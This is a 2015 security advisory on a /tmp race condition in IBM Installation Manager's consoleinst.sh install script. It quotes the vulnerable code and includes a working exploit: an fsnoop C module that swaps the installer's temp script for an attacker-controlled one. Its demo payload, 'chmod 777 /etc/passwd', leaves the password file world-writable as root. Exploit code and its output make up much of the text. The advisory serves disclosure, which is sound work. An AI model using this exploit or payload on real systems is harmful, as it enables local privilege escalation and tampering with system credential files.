Title: /tmp race condition in IBM Installation Manager V1.8.1 install script Author: Larry W. Cashdollar, @_larry0 Date: 2015-10-29 Download Site: http://www-03.ibm.com/software/products/en/appserv-wasfordev Vendor: IBM Vendor Notified: 0000-00-00 Vendor Contact: Description: IBM Installation Manager is a command line utility to install various software packages developed by IBM. =====> IBM Installation Manager> Password required Credentials are required to connect to the IBM download site. Enter IBM ID and password. Select: P. Provide credentials and connect C. Cancel Select 'P' to enter credentials and connect, or 'C' to cancel. Forgot your IBM ID? https://www.ibm.com/account/profile?page=forgotuid Forgot your password? https://www.ibm.com/account/profile?page=forgot IBM ID help and FAQ https://www.ibm.com/account/profile/us/en?page=regfaqhelp -----> C Vulnerability: I noticed a /tmp race condition in IBM?s installation manager software install script The code in consoleinst.sh is: 46 TEMP=/tmp 47 tempScript=$TEMP/consoleinst-$$.sh 48 scriptLoc=`dirname "$0"` 49 slash=`expr "$scriptLoc" : "\(/\)"` 50 if [ "X$slash" != "X/" ]; then 51 scriptLoc=`pwd`/$scriptLoc 52 fi 53 54 if [ "$0" != "$tempScript" ]; then 55 cp "$0" "$tempScript" 56 cd "$TEMP" 57 origScriptLoc=$scriptLoc 58 export origScriptLoc 59 exec "$tempScript" $@ 60 # should not return from above exec 61 exit 1 62 fi If you guess the pid and create the file before the installer script does you can inject code to be executed at line 59. This is a log of me controlling permissions of the file during installation of the product: [M] -rwxrwxrwx 1 larry larry 34 Thu Oct 29 21:46:10 2015 /tmp/consoleinst-9999.sh [U] -rwxrwxrwx 1 larry larry 0 Thu Oct 29 21:46:34 2015 /tmp/consoleinst-10382.sh [U] -rwxrwxrwx 1 larry larry 2225 Thu Oct 29 21:46:34 2015 /tmp/consoleinst-10382.sh If I'm able to write to that file directly after it's modifed (inotify() for the win) I could inject commands into that installation script. CVEID: OSVDB: Exploit Code: /* fsnoop v3.3 module for exploitation of: http://www.vapidlabs.com/advisory.php?v=156 special thanks to v14dz for getting this working, and Mudge @dotmudge for pointing me at his /tmp race condition tool l0pht-watch. @v14dz http://vladz.devzero.fr/ $ make ibm-console.so /tmp/x is : #!/bin/sh chmod 777 /etc/passwd $ ./fsnoop -p ibm-consoleinst.so [+] ./ibm-consoleinst.so: ** IBM Console Install Exploit ** [+] ./ibm-consoleinst.so: payload=[0xb77775fb] file=[/tmp/consoleinst-HEREPID.sh] [+] ./ibm-consoleinst.so: waiting for command: "/bin/sh ./consoleinst.sh" [+] ./ibm-consoleinst.so: Exploitation done. [+] ./ibm-consoleinst.so: Unloading module. ls -l /etc/passwd -rwxrwxrwx 1 root root 1901 Nov 22 2014 /etc/passwd */ #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> char title[] = "** IBM Console Install Exploit **"; /* filters */ char proc_name[] = "/bin/sh ./consoleinst.sh"; char file[] = "/tmp/consoleinst-HEREPID.sh"; /* Evil routines */ void payload() { int fd; /*from v14dz: I use a fifo here, to unlock the paymod execution right after the cp command*/ mkfifo(file, 0666); fd = open(file, O_RDONLY); rename(file, "/tmp/a"); rename("/tmp/x", file); } Screen Shots: Advisory: http://www.vapidlabs.com/advisory.php?v=156